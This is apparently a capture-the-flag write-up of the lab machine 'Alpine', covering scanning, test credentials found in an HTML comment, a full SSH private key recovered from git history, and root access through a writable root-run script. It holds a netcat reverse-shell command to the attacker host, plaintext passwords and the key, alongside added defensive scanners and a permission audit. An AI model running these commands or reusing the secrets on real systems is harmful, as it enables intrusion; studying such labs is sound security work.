Alpine

Target Description

I. Information Gathering

1. Host Discovery

┌──(root㉿kali)-[/miaosec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-06 09:30 CST
Nmap scan report for 192.168.2.1
Host is up (0.00053s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00029s latency).
MAC Address: 08:00:27:CC:CD:C8 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.33
Host is up (0.00084s latency).
MAC Address: 08:00:27:89:FE:07 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.09 seconds

Target IP: 192.168.2.33

2. Port Scanning

1. Full port scan

┌──(root㉿kali)-[/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.33
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-06 09:31 CST
Nmap scan report for 192.168.2.33
Host is up (0.00061s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:89:FE:07 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 3.94 seconds

Open ports: 22, 80

2. Detailed scan

┌──(root㉿kali)-[/miaosec]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80 192.168.2.33
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-06 09:31 CST
Nmap scan report for 192.168.2.33
Host is up (0.00082s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.66
|_http-title: Did not follow redirect to http://alpine.nyx/
|_http-server-header: Apache/2.4.66 (Unix)
MAC Address: 08:00:27:89:FE:07 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: Host: default

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.58 seconds

A domain name was found: alpine.nyx

3. UDP scan

┌──(root㉿kali)-[/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.33
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-06 09:32 CST
Nmap scan report for 192.168.2.33
Host is up (0.0030s latency).
All 100 scanned ports on 192.168.2.33 are in ignored states.
Not shown: 100 closed udp ports (port-unreach)
MAC Address: 08:00:27:89:FE:07 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 98.12 seconds

II. Web Penetration

1. Directory Scanning

Scan alpine.nyx

┌──(root㉿kali)-[/miaosec]
└─# gobuster dir -u http://alpine.nyx -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak,md,db,js
...
/index.html (Status: 200) [Size: 12461]
/.html (Status: 403) [Size: 313]
/login.html (Status: 200) [Size: 3182]
/profile.html (Status: 200) [Size: 9571]
/booking.html (Status: 200) [Size: 3217]
/.html (Status: 403) [Size: 313]
/server-status (Status: 403) [Size: 313]
...

2. Information Disclosure

Visit /login.html and view the page source; it contains a username and password

<!-- TODO: Remove test credentials before going live --> 
<!-- portal test user: testuser / WinterIsComing! -->

Log in and find the SSH username and password: developer:SummerVibes2024!
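
The leak above is a credential left in an HTML comment. The following pre-deploy check is an added example, not part of the original write-up; the keyword list, the function names and the third (multi-line) comment in the sample are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: pre-deploy check for credential-like text in HTML comments.
# Prints "<file>:<line of comment start>:<comment text>" for each hit.
# The keyword list is an assumption; tune it for your code base.
scan_html_comments() {
    awk '
        FNR == 1 { in_c = 0 }
        {
            line = $0
            while (line != "") {
                if (!in_c) {
                    s = index(line, "<!--")
                    if (s == 0) break
                    in_c = 1; start = FNR; buf = ""
                    line = substr(line, s + 4)
                }
                e = index(line, "-->")
                if (e == 0) { buf = buf line " "; break }   # comment continues
                buf = buf substr(line, 1, e - 1)
                if (tolower(buf) ~ /passw|credential|secret|token|api[_-]?key|test user/)
                    printf "%s:%d:%s\n", FILENAME, start, buf
                in_c = 0
                line = substr(line, e + 3)
            }
        }
    ' "$@"
}

# Constructed login.html; the comments on lines 4 and 5 are the ones quoted above.
build_sample_html() {
    f=$(mktemp) || return 1
    cat > "$f" <<'EOF'
<html><body>
<!-- layout: two-column -->
<form action="/login" method="post">
<!-- TODO: Remove test credentials before going live -->
<!-- portal test user: testuser / WinterIsComing! -->
<!--
  staging db password: CONSTRUCTED-PLACEHOLDER
-->
</form></body></html>
EOF
    echo "$f"
}

page=$(build_sample_html)
scan_html_comments "$page"    # reports the comments starting on lines 4, 5 and 6
rm -f "$page"
```

Run it over the web root in the build pipeline and fail the deployment when it prints anything.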

III. Obtaining developer Access

Log in with the credentials obtained

┌──(root㉿kali)-[~]
└─# ssh developer@192.168.2.33
developer@alpine:~$ id
uid=1000(developer) gid=1000(developer) groups=1000(developer)

IV. Privilege Escalation

1. Obtaining sysadmin Access

Read /home/developer/README.txt; it hints that deployment is done with git

Looking in /home/sysadmin/ reveals an exposed .git directory

1-Git leak

  1. View the git log

    developer@alpine:~$ git log 
    commit 0c6ee270764eb91ee53afc9784881371d4dddd93 (HEAD -> master)

    diff --git a/.ssh-backup/id_rsa b/.ssh-backup/id_rsa
    commit 0c6ee270764eb91ee53afc9784881371d4dddd93 (HEAD -> master)
    Author: sysadmin <sysadmin@snowpeak.nyx>
    Date: Thu Dec 11 11:14:27 2025 +0000

    Remove backup

    commit 02f9a1879dbfa40703a6bcbd985e5a19542c24c8
    Author: sysadmin <sysadmin@snowpeak.nyx>
    Date: Thu Dec 11 11:13:53 2025 +0000

    Backup SSH keys before server migration

    commit 2823ba92f4fdee9b5d71e74f9f060a5d5ed3b593
    Author: sysadmin <sysadmin@snowpeak.nyx>
    Date: Thu Dec 11 11:13:26 2025 +0000

    Initial commit: Add database config

    Three commits were found: 0c6ee270764eb91ee53afc9784881371d4dddd93, 02f9a1879dbfa40703a6bcbd985e5a19542c24c8, 2823ba92f4fdee9b5d71e74f9f060a5d5ed3b593

  2. View the commit contents

    developer@alpine:~$ git show 02f9a1879dbfa40703a6bcbd985e5a19542c24c8
    diff --git a/.ssh-backup/id_rsa b/.ssh-backup/id_rsa
    new file mode 100644
    index 0000000..76b357a
    --- /dev/null
    +++ b/.ssh-backup/id_rsa
    @@ -0,0 +1,27 @@
    +-----BEGIN OPENSSH PRIVATE KEY-----
    +b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
    +NhAAAAAwEAAQAAAQEA3ZnZAOyE5gZN5QxDnRnYnRfXHwCavg4mJz2HbUWI7p3lGi+tdL6u
    +IbqPyjqbH69DcyQCubvORi4domdpqTchLF7PyJlUBHVIo3AULC1kVhMqGvctWQxAgPRvr7
    +zM7HGr+NpTPEkM/4BjfJToy706FGjfiXBhjkSiv5cHOlnXxhO44NkKSxvySnXkmYq3PNNF
    +5OtjZJg+7+XrZKoUsaipupjOcZgsQCx1Yf1xE4gWIi/jS9kY07R0GtNdqaW2Z9UwXYGMFW
    +xGKPtczHbRgcxtdP9ne71C/Zh5zsTPtgWWx8cO+P0N0emTYNDEMlD+4IH9AygBbnAzY978
    +qc2jiRSxJwAAA8jbDUur2w1LqwAAAAdzc2gtcnNhAAABAQDdmdkA7ITmBk3lDEOdGdidF9
    +cfAJq+DiYnPYdtRYjuneUaL610vq4huo/KOpsfr0NzJAK5u85GLh2iZ2mpNyEsXs/ImVQE
    +dUijcBQsLWRWEyoa9y1ZDECA9G+vvMzscav42lM8SQz/gGN8lOjLvToUaN+JcGGORKK/lw
    +c6WdfGE7jg2QpLG/JKdeSZirc800Xk62NkmD7v5etkqhSxqKm6mM5xmCxALHVh/XETiBYi
    +L+NL2RjTtHQa012ppbZn1TBdgYwVbEYo+1zMdtGBzG10/2d7vUL9mHnOxM+2BZbHxw74/Q
    +3R6ZNg0MQyUP7ggf0DKAFucDNj3vypzaOJFLEnAAAAAwEAAQAAAQAlkP0uoOnurMbru2aC
    +7WzBRNddFBcnfPKO2Glq5szN1sqN4+M91U1jvmK9362Ic4e1rzcfEW1ojEzNyUYqP4RKJ1
    +CGKygJEXDc9BUXYCKQTPNoWtq/K8qLkeSVICaFNsf2idxubdvcPIGhDwVf9JYx+41ZmUmQ
    +eqY0YIADLlPb6g8z0Cgr0cEQg9PEBUi5FZAhji0hIz9k7BAfAzBaed94y+IPF0gG8AtsRm
    +oo9XlqTuiphbkNyTVPzE9mKoqR8pECqSLAcx5+YBFP6tOoKh1BwHqWBG5ixw3fWi2HvgPv
    +WeVRTozvXzjP1fVlYi/KyayuOLuiwQrlWvtkXwB4S3cRAAAAgEoibXJoCwzdf1naZQ4yZr
    +aHnU5Mkx1XsO3X2bWXdIRZzQuLjAlmbwjQyMRWkiRb12D2uc1LwwQ1lzlBOqnCRXjFpM28
    +/M8V6ZwYMP5bJeOGJSKEaikzY7blksM2Pls2P8zuhLiL3DnvQlB/7whKfME2MwH4tBDYTO
    +7mS6MbKIElAAAAgQD1zPzaJsyt7gAjYgn/v0Wzj7HfVlLqeLR8TGup5MP8uDq6IJV5pLkf
    +S8I4dGTOfrhgTw4VNbwy/BZNZErVnKa+zt6EsHgSqFub5ZVgpwRWx6bkk7lKPikZ62uNye
    +gtqE7uJVBu12Li4kWuzyF2/IhcSh1Sp9B7fnF6p5b+t1H84wAAAIEA5svMbW9WTDB5hvgo
    +ii5H6OZuIPGNKeEndKVquBeLjKR2QQrK9KQ0d/OgIu4ioEOmQ+NA1tWKr5uXJ4hdBvDCoS
    +4tqjiIBNSTx1qkV6tpcbKDaIjTzdCvAJ8wOMymShOVVJkmXvgIsJuydR7OQ+StvR0DRDGp
    +rkFejyhcyFIbke0AAAARc3lzYWRtaW5Ac25vd3BlYWsBAg==
    +-----END OPENSSH PRIVATE KEY-----
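
    Review bot: the new file .ssh-backup/id_rsa (the whole @@ -0,0 +1,27 @@ hunk) is an OpenSSH private key stored without a passphrase (its header encodes cipher "none"), and once committed it stays readable from history even after a later commit deletes the file. Treat the key as compromised: remove its public half from authorized_keys and issue a new pair, keep key backups outside the repository, and rewrite or recreate the repository if the object has to be purged.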

    The SSH private key is found
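
The two steps above work because the "Remove backup" commit only deletes the file from HEAD. The following detection sketch is an added example, not part of the original write-up: it reads `git log --all -p` output and reports every commit whose patch adds a private key. The function names are hypothetical and the sample log is constructed (commit ids and path are the page's, the key body is a placeholder).

```shell
#!/bin/sh
# Added example: flag commits whose patch ADDS a PEM/OpenSSH private key.
# Reads `git log --all -p` output on stdin; prints "<commit> <path>" per hit.
find_key_commits() {
    awk '
        /^commit [0-9a-f]+/ { commit = $2 }             # current commit id
        /^[+][+][+] b\//    { path = substr($2, 3) }    # file being added/changed
        /^[+]-----BEGIN [A-Z ]*PRIVATE KEY-----/ { print commit, path }
    '
}

# Constructed sample shaped like the history on this page; the key body is a
# placeholder, not key material.
sample_log() {
    cat <<'EOF'
commit 0c6ee270764eb91ee53afc9784881371d4dddd93
Author: sysadmin <sysadmin@snowpeak.nyx>

    Remove backup

diff --git a/.ssh-backup/id_rsa b/.ssh-backup/id_rsa
deleted file mode 100644
--- a/.ssh-backup/id_rsa
+++ /dev/null
@@ -1,3 +0,0 @@
------BEGIN OPENSSH PRIVATE KEY-----
-PLACEHOLDER
------END OPENSSH PRIVATE KEY-----
commit 02f9a1879dbfa40703a6bcbd985e5a19542c24c8
Author: sysadmin <sysadmin@snowpeak.nyx>

    Backup SSH keys before server migration

diff --git a/.ssh-backup/id_rsa b/.ssh-backup/id_rsa
new file mode 100644
--- /dev/null
+++ b/.ssh-backup/id_rsa
@@ -0,0 +1,3 @@
+-----BEGIN OPENSSH PRIVATE KEY-----
+PLACEHOLDER
+-----END OPENSSH PRIVATE KEY-----
EOF
}

# Reports the commit that introduced the key even though HEAD no longer has the file.
sample_log | find_key_commits
# Real repository (run from inside it): git log --all -p | find_key_commits
```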

Clean up the key from the diff output to obtain a valid private key file

Check which user the key belongs to; it is the sysadmin user's private key

┌──(root㉿kali)-[/tmp]
└─# ssh-keygen -y -f id
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDdmdkA7ITmBk3lDEOdGdidF9cfAJq+DiYnPYdtRYjuneUaL610vq4huo/KOpsfr0NzJAK5u85GLh2iZ2mpNyEsXs/ImVQEdUijcBQsLWRWEyoa9y1ZDECA9G+vvMzscav42lM8SQz/gGN8lOjLvToUaN+JcGGORKK/lwc6WdfGE7jg2QpLG/JKdeSZirc800Xk62NkmD7v5etkqhSxqKm6mM5xmCxALHVh/XETiBYiL+NL2RjTtHQa012ppbZn1TBdgYwVbEYo+1zMdtGBzG10/2d7vUL9mHnOxM+2BZbHxw74/Q3R6ZNg0MQyUP7ggf0DKAFucDNj3vypzaOJFLEn sysadmin@snowpeak

Log in

┌──(root㉿kali)-[/tmp]
└─# ssh -i id sysadmin@192.168.2.33
sysadmin@alpine:~$ id
uid=1001(sysadmin) gid=1001(sysadmin) groups=1001(sysadmin)

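2. Obtaining root Access

The script cleanup.sh is found under /opt/scripts. Checking its permissions shows that the file is run with root privileges and that the sysadmin user has write permission on it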

sysadmin@alpine:/opt/scripts# ls -la cleanup.sh 
-rwxrwxr-x 1 root sysadmin 287 Jan 6 02:30 cleanup.sh

So try writing a privilege-escalation command into cleanup.sh

sysadmin@alpine:/opt/scripts# echo 'nc 192.168.2.4 4444 -e /bin/bash' > cleanup.sh

Start a listener and wait a while; a root shell is obtained

┌──(root㉿kali)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.33] 35945
id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
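
The root cause in this section is the -rwxrwxr-x mode on a script that a root job runs. The following audit and fix is an added example, not part of the original write-up; the function names are hypothetical and the directory tree is constructed in a temporary directory rather than taken from the target.

```shell
#!/bin/sh
# Added example: audit the path to a script that a root job executes.
# Prints "WRITABLE <path>" for the script and every parent directory up to
# $2 that group or other can write. A writable parent matters as much as
# the file: whoever can write the directory can replace the script.
audit_script_path() {
    p=$1; stop=$2
    while :; do
        if [ -d "$p" ]; then
            # Sticky directories (like /tmp) are skipped: an entry there can
            # only be renamed or deleted by its owner, the directory owner or root.
            find "$p" -prune \( -perm -020 -o -perm -002 \) ! -perm -1000 -print
        else
            find "$p" -prune \( -perm -020 -o -perm -002 \) -print
        fi | sed 's/^/WRITABLE /'
        if [ "$p" = "$stop" ] || [ "$p" = "/" ]; then break; fi
        p=$(dirname "$p")
    done
}

# Fix: drop group/other write on the script and its directory. Ownership
# should also be root:root (chown needs root, so it is not done here).
harden_script() {
    chmod go-w "$1" "$(dirname "$1")"
}

# Constructed tree mirroring the listing above: cleanup.sh with mode 775.
build_sample() {
    d=$(mktemp -d) || return 1
    mkdir -p "$d/opt/scripts"
    chmod 755 "$d" "$d/opt" "$d/opt/scripts"
    printf '#!/bin/sh\necho cleanup\n' > "$d/opt/scripts/cleanup.sh"
    chmod 775 "$d/opt/scripts/cleanup.sh"
    echo "$d"
}

root=$(build_sample)
audit_script_path "$root/opt/scripts/cleanup.sh" "$root"   # flags cleanup.sh
harden_script "$root/opt/scripts/cleanup.sh"
audit_script_path "$root/opt/scripts/cleanup.sh" "$root"   # prints nothing
rm -rf "$root"
```

On a real host, pass `/` as the second argument and run the audit for every script referenced from root's crontab and systemd units.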

V. Viewing the Flags

cat /root/root.txt /home/developer/user.txt
6b75b087f12ed42f124d68493469a493
30a0cf321ff0c0997f45a7202490b260

Alpine
http://miao-sec.github.io/Vulnyx/Alpine/
Author: Miao
Published: January 9, 2026
License: BY-MIAO